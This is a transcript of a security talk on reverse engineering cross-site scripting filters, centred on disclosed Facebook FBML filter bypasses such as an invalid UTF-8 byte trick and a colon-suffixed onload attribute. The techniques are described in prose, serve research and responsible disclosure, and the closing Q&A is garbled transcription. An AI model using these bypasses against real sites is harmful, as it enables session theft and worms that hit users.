This presentation is going to be about web security and cross-site scripting and I realize that usually these topics are considered to be kind of lame but I'm approaching them from a reverse engineering perspective and I find the combination between the two areas of hardcore reverse engineering and very vague cross-site scripting to be kind of interesting and I'm hoping that by the end of the talk you will agree with me, hopefully. So we know that while the future might not have the flying cars that we were promised, there will be web applications and web applications will be a very major part of computing. I'm sure that virtually everybody here has used web applications and will use them more and more and will come to depend on them. So web applications are the future of computing or at least a very major part of it. So where does this put reverse engineers? Well, it reverse engineering is about the mindset. So you can apply it to any type of application and web applications are a little bit different but if you approach them as a target that you need to understand and master, you can get pretty far. The main differences are that web applications are usually hosted somewhere else commercially and you don't have access neither to the source code nor to the binaries. So you cannot use the standard disassembler reverse engineering or debugging techniques. The main technique that you can do, you can use is black box reversing which basically means sending data, looking at the output and trying to figure out the internals of the application from that. And I find that in particularly very interesting because it's kind of different than the traditional reverse engineering approach. Also, the environment is very different and the tools are very different. The things that you're looking for are very different but I think it's the mindset that really matters. So you can learn the new environment, the new tools that doesn't really matter too much. And in particular in this talk, I'm going to talk about cross site scripting which is so prevalent and it's such an easy and common mistake to make for web application developers that I think of it as the strength copy of the web application world. And in the first part of the talk, I will do a brief introduction to cross site scripting for those of you who are not familiar with all the details. To prevent cross site scripting, developers usually utilize cross site scripting filters which is what we're going to be reversing. And I will demonstrate some techniques that I have for reverse engineering these cross site scripting filters. So this is how the presentation will proceed. First, I'll present the problem and I'll give a few examples for why cross site scripting is a really big deal and why it's getting more and more important because of various developments in web applications that are happening right now and particularly user generated content and the very loosely defined web 2.0 thing. Then I'm going to talk about how developers implement cross site scripting filters, what the different approaches are and what their advantages and disadvantages are. It's important to understand the implementation of the thing that you're going to be reversing before you start reversing it so that you have some idea of, so that your guesses are more educated. Then I'm going to present some approaches for reversing these cross site scripting filters. I'm going to show you a little tool that I wrote to automate some of the steps. And finally, I will demonstrate a cross site, a few cross site scripting bugs in Facebook and I will show how I used my tool against Facebook to reverse engineer their filter and get some pretty interesting results. So let's start. So you've all heard about the web 2.0 thing. I've heard many different definitions but the parts that are particularly relevant to what I'm going to be talking about are the user generated content which is any content that doesn't come from the creators of the site but it comes from users, third party services. Part of this is also the mashups, RSS readers. If you have a web application that works as an RSS reader, it's going to be pulling content from various untrusted sources and it's going to be displaying it. You also have aggregate, you also have mashups like the mashup between Craigslist and Google Maps that combine them and showed available apartments for rent on a map. So perhaps you can trust the, perhaps the developer of that mashup can trust the stuff that's coming from Google Maps but can they really trust the data that's coming from Craigslist? Now perhaps there is a way to inject some code into the mashup application. So because of the web 2.0 development, now we have these architectures that are very distributed and you have a lot of services that depend on other services that they do not control and very often they do not understand. And by that I mean the developers might understand how to use the data coming from Craigslist but the specific, the specific format of the data, exactly what kind of data is allowed, what kind of characters are filtered is not precisely defined and it might change over the lifetime of the application because Craigslist might change their format or might change their implementation. So I was talking to Dino before the talk about this and he made a very good analogy to bring it back towards stuff that we're perhaps more familiar with. The taint analysis, the taint propagation idea, when you look at traditional binary applications and you're looking at untrusted data, you try to model the flow of that data and see where it's being used. In web applications, it is pretty hard to trace the flow of that data because pretty much all of the data is untrusted and it comes from various services which might be pulling it from other services. So because of the distributed nature, it's very hard to model the entire system. You can only, you're only looking at one little front end piece and you don't know exactly where all the tainted data might be coming from. Also, the data goes through a lot of transformations, different formats, translations, different encodings. So there are a lot of problems there. And the main point is that because of this aggregation and the distributed nature of these applications, you have a significantly increased attack surface compared to the traditional websites that contain nothing but HTML and you throw it up on GeoCities and there is no real big risk. These new architectures are a lot more interesting to break. So let's look at user generated content. This can be, this can take a lot of forms. It can be text. You have plain text which is a lot of forms that you fill out in the internet, forums. You have some kind of lightweight markup which some services use. This can be something like bbcode which is a markup, markup language used in some forums. Wikipedia also has a, some kind of markup, markup language. Some services are trying to use HTML for this because their users might be more familiar with it. So blogs allow you to use some tags, some HTML tags when you do a blog comment. And finally, you have some services that are attempting to give their users almost the full power of HTML, even JavaScript. And if you look at the order in which I have these bullets, filtering the bad stuff from the user generated content gets increasingly harder as you go down. So filtering stuff from plain text, fairly easy. Filtering stuff when you're allowing users to use all HTML tags and you can do it in JavaScript. I wouldn't say impossible but it's very, very hard. There are a lot of subtleties. You also have images, sound, video, even flash. And these have their own, these have their own problems. Most of the problems there are with images and sound files or file format vulnerabilities which can be used to exploit the browser, the client that is looking at them. I'm not going to talk about them in this presentation. I'm going to focus on cross site scripting and specifically on text based cross site scripting. There are some interesting things you can do with cross site scripting in Flash but, you know, I'll leave them for another talk. So sometimes the user generated content turns into attacker generated content and I have some examples there. We have the Sammy's MySpace worm which you're probably familiar with. In fact, it ate million people in MySpace. We've had some Orchid worms including some that were stealing bank information from the users. There have been attacks against web mail applications. They're a pretty, pretty juicy target. Actually, Skyline wrote a cross site scripting worm that had the ability to propagate between Hotmail and Yahoo mail back in 2002. I think this was the stone age of cross site scripting before people really realized the full potential of what you can do with these bugs. We've also had bugs in Squirrel mail. There have been some WordPress hacks through cross site scripting. So all of these services are things that a lot of people use, probably a lot of you and nobody likes to be hacked. So the threat is there. Let's look at what exactly cross site scripting is. So this is a very simple case and if you already know all of this, so please bear with me, the section after this will get a little bit more interesting. So we have a little app which takes, a little web app which takes the name of the user and then it prints hello, the user name. And if as a parameter to that app, you give the script tag which is shown in red, then if the application doesn't do any filtering, it will just output the same script tag into the HTML code. And when the browser, when the browser displays that HTML, it will execute the script inside the script tag. Why is this bad? Well, this is bad because the web security model which was designed a long time before the current push towards web services, web applications and user generated content. The web security model assumes that everything that comes from a specific site is safe because it's controlled by the person who wrote the HTML in notepad. But things don't work like this anymore. Now we're combining different, different, different types of content on the same web page. And the same origin policy which is the main part of the web security model says that a script loaded from a page from one domain does not have access to any other domains, any other pages loaded from other domains. And the classic example there is if you're logging into your bank, some other site like you go to slash dot and the code on, the JavaScript code on slash dot does not have access to anything on the bank site even though it's in the same browser. Because cross-site scripting allows you to execute our external scripts on a page that's served from a domain that is not under the attacker control. Cross-site scripting allows you to subvert the same origin policy. So in the previous example we had a script that the attacker controls executing on the page where the web application is and this could be a web banking application or something else that's important. So what can cross-site scripting do? Once you can execute JavaScript on a page, you can steal all the data from the page, you can capture all the key strokes on a page, you can capture all the data that's typed into the forms, you can steal authentication cookies and even, you know, the most powerful attack is the ability to do arbitrary HTTP requests against the same domain. And the data coming from these requests is available to the JavaScript. So the JavaScript can fully impersonate the user who's using the browser. There is no way for the web application to distinguish between actions taken by the real user and actions taken by the JavaScript that has been injected into their browser. So if cross-site scripting is so bad, what can we do to prevent it or what can web developers do to prevent it? The obvious thing is to just remove all the script tags from the content that you're taking from the users. However, there are a lot of challenges there. First of all, there are a lot of HTML, different HTML features that allow scripting. It's not just script tags, there are many other things. I have another slide where I'll show some examples. There are also proprietary extensions to HTML. So if you read the HTML standard and just do everything according to the standard, that's not going to work for Internet Explorer or Firefox. I think Firefox is, I think Firefox might have some proprietary extensions too. There is also the problem of invalid HTML. The parsers and browsers are notoriously forgiving to malformed HTML and they will fix it for you. So if your filter looks at something and says, oh, this is malformed, so it's not a script tag, the browser might interpret it as a script tag. And finally, you have browser bugs, not necessarily browser vulnerabilities but just bugs in the parsers which the person writing the filter needs to be aware of. So, here are a few examples of different ways you can inject scripts into websites. You can use a script tag with a source attribute. You can use a script tag with a JavaScript embedded inside the tag. You can use event handler attributes like the onload attribute and the JavaScript contained in the attribute will be executed. You can also use style sheets. There are a couple of different ways for style sheets to execute JavaScript. This is just one of them. And finally, you can use URLs. If you use a JavaScript calling URL in an image source, I think Firefox and IE fix that so you can no longer do it with images but you can do it with other types of elements. So, all of these things are features that you need to take care of in your filter. You need to be aware of their existence. And these are the simple ones because they're standard. Any HTML, anybody who knows HTML would probably be familiar with them. But there are a lot of other weird ones. For example, IE supports these things called XML data islands which basically allow you to put a reference to an XML file or even embed the XML inside the web page and then refer to that XML in a different element like a span element. So, in this case, you don't have any script tags on the actual website but any scripts in that XML file will be executed as if they were on the same page. You also have Netscape 4, an extension that allowed you to put JavaScript in any attribute. These, this was removed in Firefox so it's no longer there. But you also have conditional comments. So, if you write a, if you write an XSS filter that assumes that all comments are safe and you just let it, let them through, an attacker can use this code to cross site script you. This is conditional comment which Internet Explorer interprets and it says if this page is being displayed in an Internet Explorer browser with a version greater than four, greater or equal to four, then interpret the contents of the comment as HTML. So, even if you handle all the proprietary extensions, you still have problems with the browser parsers and this is one very funny example. It shows five different ways you can bypass filters if they assume that, if they don't handle, if they don't parse the HTML the same way the browser does. So, here we have an extra, an extra less than sign before the opening tag. We have a null byte inside the tag name. This is interesting. In Internet Explorer, you can put null bytes anywhere in the HTML as many as you want and they just get completely ignored. So, you can use them to break up the name of the tag. You can also use a forward slash as a separator between the tag and an attribute instead of whitespace. You don't need quotes around the attribute value. You don't need a greater than sign when you close the tag. So, your XSS filter needs to be aware of all these things and it needs to, it needs to duplicate the behavior of the browser but the behavior of the browsers when dealing with malformed HTML is not documented anywhere and it differs between not only different browsers but also different versions of the same browser. So, for example, Internet Explorer will interpret this script tag as the script tag shown below. Firefox will not, I think because of the null byte but if you remove the null byte, it will work in Firefox too. And finally, you have just things that are just bugs in the browsers and here are two examples and you should pay attention to these examples because these two particular things will come up in a later slide. So the first bug, the first bug I'm going to talk about is invalid UTF-8 handling. So, in UTF-8, unlike ASCII, you have multi-byte characters and the first byte in a multi-byte character determines how many bytes constitute the character. So, the C0 byte that I have there in the HTML says this is a two-byte character but because of the particulars of the UTF-8 encoding, C0 is not actually a valid first byte. So, when Firefox and IE7 interpret this HTML, they look, they reach the C0 byte and then they say, oh, this is an invalid character and they replace it with a question mark. Basically, if you do view source in Firefox on this HTML, you'll see a question mark where that, well, where that character used to be. And they replace the first byte with a question mark and then they continue. So they will interpret this element as having two attributes, foo and bar and they're shown on the slide there. IE6, however, will parse this two-byte character and it will see that it's two bytes. So, it will skip over the second byte and it eats the, this allows you to eat the closing quote of the attribute because both the C0 byte and the quote byte that follows will be replaced with a question mark. So, if you can inject a C0 byte inside an attribute, that C0 byte will eat the next quote and you'll see that Intranet Explorer 6 will interpret this, interpret this element as having two attributes, the second one of which is an onload attribute which allows you to execute JavaScript. So, if you're writing an XSS filter, you need to, you need to decide how you're going to handle invalid UTF-8 sequences. Do you handle them like Firefox does or do you handle them like IE6 does? And both ways are, both ways have the potential of breaking the other browser. So, you need to make sure that you remove the UTF-8, the invalid UTF-8 sequences before you even start parsing. And if you, if you don't think of this and a lot of web developers just don't know that this thing even exists. So, if you don't, if you're not aware of it, you're probably going to write a, you're probably going to write an XSS filter that just lets C0 bytes through and then you'll be vulnerable to this bug. There is another interesting case in Firefox versions before 2002. The parser had a bug where it treated a number of weird characters as white space when parsing attributes. So, if you have this HTML and you have an onload attribute followed by all these, all these characters, Firefox will see this as an onload attribute followed by a bunch of white space and then equal sign and then the JavaScript code. If you're writing an XSS filter and you want to remove onload attributes, you might parse this as, if your regular expression for finding attribute names allows anything that's not a, anything that's not a space, then you might interpret some of these characters as part of the attribute name and then the attribute name will not match onload and you will not remove it. You will let it through and Firefox will execute the script. So, writing cross-site scripting filters is pretty hard. You have to be aware of all these things. There are some good ones out there but a lot of the, there are a lot of cross-site scripting filters that are not good at all. When we were reversing, so I hope I didn't bore you too much with this section. We'll get to the reversing part in a little bit. One important thing to note, to understand when you're reversing something is to understand how it's actually designed and how it's written. Like you need to know how you would write this type of program so that you can understand what the developer was thinking when they were writing the program. This is why I'm going to show you the different ways you can write XSS filters. And the first way which used to be pretty common but it's not very good at all is to just use regular expressions to remove bad stuff from HTML code. So this regular expression removes the script tag. There are countless ways you can bypass these types of filters. The most fun one is to use the filter against itself. It's the third bullet there. If you have a script inside another script then if the filter runs only once, it will remove the first script, the first script string and then the two parts around it will come together and form a real script tag which will then get sent to the browser. There's also a lot of problems with the invalid HTML, different encoding issues, attribute values can be encoded in like many different ways. So your regular expression very quickly, your regular expressions very quickly get very, very complicated. And these filters, I'm not really going to talk about reversing these types of filters just because they're too trivial. Here is a better way to do cross-site scripting filters and most of the good sites use this approach. You take the HTML and you actually parse it and you build an in-memory representation of the HTML tree. So for example, when we parse this, the filter will build this tree representation with a body tag that has an unload attribute that has an alert string for its value and then you have a script tag, a p tag. This allows you to very clearly distinguish between what is a tag, what is an attribute name, what is a value. The main benefit of this approach is that you can do canonicalization which means that you would parse the input, you would build this memory representation, then you would apply your XSS filters and you would apply them on the tree. So if the XSS filter says remove all unload attributes, you don't need to use regular expressions to find the attributes because your parser has already extracted all the attributes in the tree representation. So you can just walk the tree and remove the things that you don't like. Then you output the tree, you write it out based on the in-memory representation. So this solves the Firefox problem to an extent because it will remove all the weird white space, all attributes will be outputted in a canonical form, attribute name, equal sign, quote and then the attribute value and the canonicalization also makes sure to escape all the character, all the special characters properly, close all tags, they're not closed. So by being very careful about how you do the output, you can ensure that the browser will, when parsing that output will interpret it in the exact same way that your filter interpreted it and this is a much safer way to do cross-site scripting filtering. The final point I'm going to make about the different implementations is about whitelisting versus blacklisting. Most people usually do blacklisting at first and then they discover that there is this other HTML thing that I didn't think of and I need to add it to the blacklist. They'll add it to the blacklist and then it will be another one and then the next version of some browser will come out and it will support some element called, you know, foo script which allows you to do scripting as well and if that element was not on your blacklist, now you're vulnerable again. So a much safer way is to use whitelisting where you only allow the elements and their attributes that you know that are safe. The only, and if you do a good job of this, the filter will be very solid unless some browser comes out and changes the meaning of some attribute. This happened with style sheets, CSS. Initially, CSS did not have support for executing JavaScript so it was safe to have, to allow style attributes in your HTML. But browsers added the, added the support for JavaScript and CSS so now this was another thing that you have to, that you have to filter. Oh, and CSS filtering is also kind of, to do CSS filtering, perhaps you don't want to remove all the style sheets, you want to, you also, you only want to remove the ones that contain JavaScript. So now, in addition to your HTML parser, you have to write a CSS parser and the CSS parsers have the exact same problems that I presented earlier. You have browser incompatibilities, browsers accept invalid, malformed CSS and fix it up. So it's the same thing all over again. And the proper approach to doing filtering on CSS is to build a tree again, filter it and then output it in canonicalized form. I'm not going to talk about CSS in this talk. I just wanted to make the point that, you know, sometimes even if you think that you have everything covered, the browser vendors will come up with something new that you have to add. So now that we understand how cross-site scripting filters are developed, we need to look at how to reverse them. Reversing cross-site scripting filters is kind of different because you don't actually have the source code to, well, in most, for most interesting web apps. You don't have the source code, you don't have the binaries. The web app is running somewhere in the cloud. You don't even know where it is. One thing that you could do against these kinds of apps is fuzz them. But fuzzing remote web apps is limited by how much bandwidth you have. It's also limited by the latency. And also if you start sending like gigabytes and gigabytes of data to a web app, you know, maybe they'll notice and they'll shut you down, they'll ban you. We're presuming that they don't want you to reverse this. If they did, then they'll probably give you the binaries. So if we cannot do full-scale fuzzing with a lot of randomness, then we need to do something smarter. And what we can do is the blank box reversing approach where you're sending, you craft some kind of input, some kind of HTML that's perhaps malformed in different ways. And then you send it to the cross-site scripting filter and you look at the output from that and you see how the cross-site script, how the XSS filter modified your input. And based on the different modifications, you start to figure out how this, how the filter actually operates. For example, one good way to determine whether the cross-site scripting filter uses stream parsing which is similar to the string matching filters versus building a tree in memory tree representation is to look for places where the cross-site scripting filter would change something, will change some tag based on the contents of the tag or some other tags that occur later in the stream. If you have a case like this, it means that the filter must have a full tree or a more or less complete tree somewhere in memory to walk. It cannot do it based. It is not just looking at the characters that came before the current point. So it is not a stream filter. So I think this is probably the most important slide in the presentation. This is the main point that I wanted to make. The approach that I've taken to reversing these cross-site scripting filters is based on the following algorithm. So first, you guess how the filter would work. You know, you just make an educated guess, very basic. Then you start generating test cases and you inspect the result. Based on that result, you update your model. So if you notice that some elements are not, some elements are not allowed, then perhaps this is a blacklisting filter. So you update your mental model of the filter to include the code to remove elements from the blacklist. You can send test cases to see if it's a blacklisting or whitelisting filter. If it removes, if you put an element called foo, which is not a valid HTML element and that element goes through, then the filter most likely is a blacklisting filter because a whitelisting filter would only allow known elements and foo is not a known element. So you do this, you do this, you use this iterative approach to update the, to update the model as you learn more based on your test cases. This model can be, this model can be a mental model, you know, just in your head. It could be a, it could be a text file where you just write some notes. It could actually be pseudo-code. You could even implement the, implement the model in real code if you want to be really thorough. And one interesting thing is that if you implement the model, you'll have a local duplicate of the filter and then you can do perhaps some, to confirm that your local implementation of the filter is the same as the remote one, you can do some fuzzing where you just send random, random input to both filters and make sure that their output matches. So let me give you a little example of exactly what kind of test case you would send and what you would learn from that test case to update your model. This is, this is some Ruby code that goes through all bytes from 1 to 256, 255. And it iterates, it iterates through these bytes and it mutates a piece of HTML. So the X, the part that's shown in red there will be replaced with each value of the byte. So we're going to have a lot of P elements that have this attribute A and then before the attribute A, you're going to have some, you're going to have a random byte. So this allows you to, this allows you to test the behavior of the parser and find out what the parser considers white space between a tag name and an attribute name, what the parser considers a valid attribute, attribute character. And to give you a real example of this, I have some, I have some output here. I hope you can see it. I tried to make the font big enough. So what we have here is all of these bytes from 1 to 255 and first we have the number of the byte and then we have the output from the filter and this is actually the Facebook filter. So we're going to learn how the Facebook parser parses attributes. You can see that a lot of these, a lot of these bytes result in the attribute being completely removed and this is because the parser treats these bytes as something that's an invalid. It's neither white space, it's neither part of the attribute name. So it's some kind of broken HTML and it just ignores the, ignores the attribute that follows. You have some bytes like the tab character, the vertical tab character, the tab character, also the new line characters down here. These, these bytes are treated as white space by the parser and you see that we get an A attribute in the output. Also one interesting thing is that the character between the P tag and the attribute name is always a space and this tells us that the Facebook filter is using canonicalization. It builds an in memory representation and then it outputs it and it always outputs a single space between tag names and attributes. We don't see the new line characters or vertical tab there. So as we go, as we go through this, you know, here's another, here's another white space character, it's the, that's the space. Also for some reason 22, that's a double quote. For some reason double quote and single quote and forward slash are also counted as white space in this, in this particular place and in the parser. We can also see if we scroll down, we're also going to find some characters that are being treated as part of the attribute name. These are 0 through 9, also the colon character and I believe this is because of XML namespaces. The format there is the namespace name colon the attribute name. The interesting part here is that Facebook does not actually validate that you have a namespace name followed by colon. So you can have the colon as the first, as the first character in the attribute and you should also remember this because it will come up later. So based on this, based on this, based on these results from like a single test case, based on these results from a single test case, we learned that the white space, that these characters are treated as white space and that these characters are valid attribute, are valid attribute names. So to actually do this on a larger scale, I wrote a little tool called refilter and it's not actually, the slide says a framework but it's not actually a framework. It's, I wrote it specifically for Facebook. It could be extended to handle other sites as well. It has sort of a modular architecture although it's a pretty small script so architecture is perhaps a pretty big word for this. But it has these modules that are supposed to abstract the application specific functionality. So it has a generic send test case method and get results method and you can build different modules for different web apps that implement the specifics of exactly how do you send the test case, where do you put it in the HTML request, what the URLs are for the request. I also have modules that implement different tests and this previous example was actually taken from one of the tests. These modules contain a bunch of test generator functions that just generate the data that we're going to send as this test case. The nice thing about refilter is that you have, I mean, I've done this manually as well with just a browser but refilter gives you the ability to replicate your results in point because you have all of your tests, all of your test generators are in the code and you can run them repeatedly automatically. So, and the output from the test cases is stored on the disk in like an output results directory. So a nice thing about this is that you can run all the tests, get the results from them and then if you find a bug, I actually did this, I found a bug, I reported it to Facebook, they fixed it and after they fixed it, I ran my tests again and it was just a single line, I told refilter just run all tests. It ran all tests and then I had two results directories and I just diffed the two directories to see what changed in the Facebook filters and I found the changes that they had made to fix the vulnerability I reported and then it took me about an hour to break it because their patch wasn't complete. There was another place where you can do the same thing that they did not fix but, you know, that's how it always is. So what do you do when you have the model of the filter? This is the more academic part. Once you have this model, you can build a grammar out of it. And this is pure speculation, I have not actually done this but I've done it sort of informally in my head but you could actually build a formal grammar for the output that this filter produces, all the possible variations. Once you have that grammar, you can do the same for the browser and you can build a grammar of all valid ways of all HTML that can do scripting that the browser accepts. And you can do this by either reading the source codes of the browser or reversing it or you can do some kind of fuzzing or you can apply the same test case, you can apply the same iterative model generation approach that I presented to figuring out all the different things that the browser accepts. Perhaps you can even automate, this is an interesting topic for the research, perhaps you can automate the generation of the grammar in some kind of BNF form from like a black box parser. This would be a pretty useful tool to have. Once you have the two grammars, you need to find a valid sentence in both grammars that contains a script tag and if you do, you have a cross side scripting vulnerability. Of course, this, you can look for all the other ways to run scripts as well. This steps, this step can perhaps be automated as well. It will make a pretty nice research project for some kid in school. So, if there are any students here who are interested in working on this, let me know. If you're not the academic type and you like quick results, you can actually implement the model and then you can fuzz it. And because the model will be running, the filter will be running locally, you can fuzz it up very quickly, you can throw like billions of random test cases of that and perhaps you will find some vulnerability in it, some way to bypass the filter. So let me give you a real example of how this works and I'm also going to show you the refilter script. But before we get to that, let's talk about Facebook. Facebook is, Facebook was the reason I, Facebook was the first target that I picked when I decided to play with this. Facebook is a social network application, you get a social network platform, you get a, you get a profile there and you can send messages to your friends, you can post stupid pictures. One interesting thing about Facebook is, and I think they're probably the first social network to do this is they, they tried to turn their site into a platform for application development. So you can build third party applications that integrate with Facebook. And what these applications can do is the following. They can build special app, they can build specific application pages which are hosted in the apps.facebook.com domain and each application has its own page there. And these pages can show whatever content the application needs to show. One of the apps that I use on Facebook is the chess app which lets you play chess against other people on Facebook and its application page just shows you a chess board and all the current games that you have. In addition to the application pages which are sort of separate from the main Facebook, they're not integrated completely. Applications can put content in user profiles. So if you've ever seen a Facebook profile, you probably saw a bunch of stupid boxes in the profile for like the vampires versus zombies game or a little map that shows you the places where that person has traveled around the world with like little pins. Most of the apps are pretty, pretty, pretty stupid but that doesn't make them, that doesn't make the platform any less interesting for our reverse. So applications have the ability to add content to user profiles. So if you want to do a, if you want to do a worm, perhaps adding content to the user profiles and finding a cross site scripting bug in that functionality would be the way to go because then everybody who looks at the profile will get infected by the worm. Also another way for propagating these things would be through message and wall post attachments. Facebook allows you to attach almost arbitrary HTML to messages that you send to other Facebook users and again they rely on their cross site scripting filter to ensure that these attachments don't contain anything bad. The way they do this is by defining something called FBML which is a subset of HTML. It's almost a complete subset actually. They support almost all the tags. This is the application developers write their pages and the content that they want to display to the users in this FBML markup. It looks almost exactly like HTML and it has some custom tags. For example, there is a custom tag that's supposed to be the name of the currently logged in user, the user who's looking at your app. So if you put this tag there, Facebook will automatically replace it with the name of the user who's looking at the page. So it allows you to do some kind of dynamic programming. It has style sheet support. It also has support for scripting which is kind of neat. You can actually run JavaScript inside FBML and they have a pretty ingenious way to sandbox the JavaScript and it's actually pretty clever. I'm not going to go into it right now because time is, the end of the talk is coming up. But if you want to find out more about the JavaScript sandboxing, you can ask me after the talk. So Facebook is one of the examples of sites that allow almost unrestricted HTML and JavaScript and their cross site scripting filter needs to be very, very good to block everything. So I wanted to find out how good it is. This is the typical architecture for a Facebook app. You have the browser and the browser requests an application page from the apps.facebook.com domain. Then apps.facebook.com serves as a proxy and it requests that page from the site of the developer. For example, funapp.example.com. Then the third party site does whatever it needs to do. For example, the chess application reads the database and show you, it shows you the current chess board and it does this using FBML and it returns the FBML content to apps.facebook.com. Then Facebook ensures that FBML is well formed, does not contain any bad stuff, does XSS filtering and then sends this back to the browser. So if there are any ways to bypass the cross site scripting filter there, the third party application can exploit the browser of the user who's using it. So I used the refilter script and my script writes the test cases in a file in a directory that's shared with Apache and then I have that IP address configured as a Facebook application. And then refilter makes the client request to Facebook to get that, to get that application page. So refilter, in a way, the machine where refilter is running acts both as the server for the FBML and as the client that reads the HTML. So this is how you can do the full cycle and you can send the test case and then read the result. And what I found out through the testing is that Facebook does use the DOM parser. It builds an in-memory representation of the parsing tree. It fixes invalid input, canonicalizes everything that it outputs and it uses a white list for tags. So it only allows tags that are known to be safe but a black list of attributes. So if you can find some way to confuse the parser and build an attribute that the XSS filter allows but the browser will interpret as a, some kind of scripting attribute, then you have a cross-site scripting vulnerability. So let me show you, let me show you the refilter. Let me show you the refilter script, just a few quick examples. I have only two more slides so I'll be done shortly. This is the main script. Sorry if you can't read it very well in the back. The script basically consists of a loop that goes through all of the tests and then it says running test and then it calls, it calls, I have a Facebook, this is the Facebook module. So I create a new instance of that and I send the test data here and then I read the result and then I check for our Facebook errors and then I sleep for a second to not hammer the servers and then I just iterate through that repeatedly. I mean, code is not really interesting at all. Here's what the, here's what the Facebook specific module looks like. It has, it has functions for sending the, sending the HTML request, reading the response, parsing it to extract the actual data that you're interested in. Again, not very interesting code but this is probably more entertaining. This is the test module that contains the test generation functions and here's the, here's the one that I showed earlier on the slides. It just iterates through all these bytes from 1 to 255 and then it prints them, it prints them out and it sends this as the, as the data. I have a lot more tests and I'm going to, I'm releasing this so you can look at it later at the release here but it just tests various, various aspects of the parser and then based on the results you can, you can figure out what the parser did and the results are stored in this results directory and here you have the names in unreadable blue. You have the names of all test cases. So we have HTML tag open which is one of the test cases and we have the input. So this is the input that we're sending to Facebook and you can see that we're iterating through a number of characters to see how they affect the parsing and then we have the output which is what Facebook returned and based on this we can figure out how the parser works and then we also have an error page which contains errors that the Facebook parser displays. So these are interesting for gaining some understanding of it but it's not really required. You can do this just with the input and the output. So remember the two, remember the two browser bugs that I talked about earlier, the UTF-8 invalid sequences and the Firefox attribute name bug. These are the two bugs that I'm going to show. Facebook was vulnerable to the UTF-8 bug because its parser seems to treat everything as just ASCII or byte streams internally but they were serving the output with a content encoding set to UTF-8. So you could inject a C0 byte inside an image tag and Facebook would just output this and then Internet Explorer 6 would parse this as a tag with an unload attribute and then it will execute the JavaScript. So I reported this to Facebook in February and they fixed it and the first time they fixed it, they did the UTF-8. They did proper UTF-8 parsing only inside attribute names, sorry, attribute values because this was the test, this was the example that I gave them. So after they told me that it was fixed, I did some more testing and I found out that you can do the same thing with invalid UTF sequences inside just normal text outside of an attribute. So I told them to fix it again. It took them about a month to finally fix that which is still much, much faster than the typical response time you get from somebody like Microsoft. So perhaps web services do have some advantage although I think it should be faster than a month but this is how long it took. And this is the more fun one, it's still not fixed. I'm actually publicly disclosing it right here for the first time. It doesn't really affect any real users because it only affects Firefox versions less than 2002. So you're probably not going to see a worm based on this or anything more interesting. But it's a good example for a Facebook bug. So when I described the Facebook parser for attribute names, I made a point of the colon being a valid attribute name character. So when the Facebook filter parses this HTML, it will see this as a onload colon attribute. And onload colon because they use white black listing for attributes, onload colon does not match anything that's on the white list, sorry, black list. Only onload is on the black list. So they will let this attribute through and they will print it out. When the Firefox browser parses this, it will see it as a onload attribute and then it will execute the JavaScript that's inside it. So let's get to the fun part. I have, yes, there. Let's see if I can make the font a little bit better. Yeah. So this is Facebook and this is the, this is an application that I wrote. It's called Zuckerbug. It's at apps, facebook.com slash Zuckerbug and it has a little table with all the bugs that I found and all three of them. And it has test cases. So the first two are fixed. So we're not going to look at them but the third one is the one I just described. And when I click on test, we get a JavaScript alert that tells us that we have XSS and the domain is facebook.com. I didn't have enough time to make it do anything more flashy but once you can execute JavaScript and Facebook, you can do whatever you want. And if you want to look at the source for this, where is the, there. If you want to look at the source for this, this is the Facebook page and our content is right here. Sorry, it's really hard to work with it because I can only see it on that screen. But we have an image tag that loads this, this, this image and then we have a unload colon equals attribute that evaluates this JavaScript statement and this is what shows the alert. So in conclusion, there are a lot of problems with the Web 2.0 sites and the general architecture there. The reasons for these problems are first, the web security model which was designed for, which was designed with the assumption that sites only contain safe content that was put there by the creator of the site. They did not anticipate having third party data, dynamic data, user contributed content. There is no, there is no way to combine data from different, data with different trust levels on the same page. There are some proposals for adding this in the future version of HTML but at this point, if you add, if you combine two types of data on the same page, they will have full access to each other and also full access to everything else in the same domain. So there's no way to sort of sandbox HTML content and that's why we have to do this type of, this kind of XSS filtering which sometimes fails as we saw. Another problem is that the security of the system, you cannot really talk about security of a website in isolation because it depends on the interaction between the website and the client. And if the behavior of the client changes perhaps because of a new browser release or because of some undocumented feature or behavior of the browser that the creators of the sites did not anticipate, the security of the whole thing could be impacted. And the final reason I think for these significant problems is the programming languages that we use. And I want to make an analogy with C and string copy. So C does not have a native string type. However, it turned out that strings are pretty useful in programming and pretty much any program has to, every program has to deal with them. So people started simulating the string type using arrays of characters, using different approaches and a lot of people wrote their own string implementation, string implementations, string libraries and a lot of these, a lot of these implementations were just unsafe. For example, if C had a native, if C had a native string type that was similar to the one in Pascal that had the length of the string in the beginning, then a lot of, all of the string copy vulnerabilities that we've seen over the last 20 years would just not exist. Similarly, in the web world, we have a mismatch between what the programming languages provide and what the developers actually deal with as data. The way most of these, the way most of these websites are created is by string concatenation. So even though the developers are dealing with HTML and are manipulating HTML, these languages don't provide a native HTML or XML data type. You have to, you have to write your own implementation, your own parsers, your own validators and there are a lot of ways in which you can, you can get this wrong. If we had a programming language that supported this natively and perhaps did not even have strings at all to force the developers to use the proper approach, then I think the incidence of these cross-site scripting bugs would drop dramatically. And finally, you know, this talk was not just about web security, it was also about black box reversing and this is recon after all. I find web application reversing kind of exciting because it's different, sort of challenging. We're at the point where we need much better tools, automation, so there's still, there's still the possibility of creating something new and coming up with like a cool new tool that does something interesting. So I think it will be a pretty interesting topic to pursue in the future. So this is all and if you have any questions, where is my, yeah, there's the question slide. I think we're out of time so you should, do we have time for a question? Okay, great. So the next speaker should come up and do you have a... Do you have a question? The only connection that I see is that ASN 1 is so horrible and it's so hard to get out of their apart from their own and that's going to be difficult for us that you'll have to do something with it. But I would say that the moment you look at this, it's right at the end of this area and it's really tough to figure it out because at of problems with HTML parsers. We have not seen very many problems with parsers for comma delimited files, comma delimited text files because the format is just simpler. So if you're building a format, try to make it as simpler as possible and as well defined as possible. This is my advice. As a good guy, as a bad guy, you should definitely use HTML and you should add some custom features to it.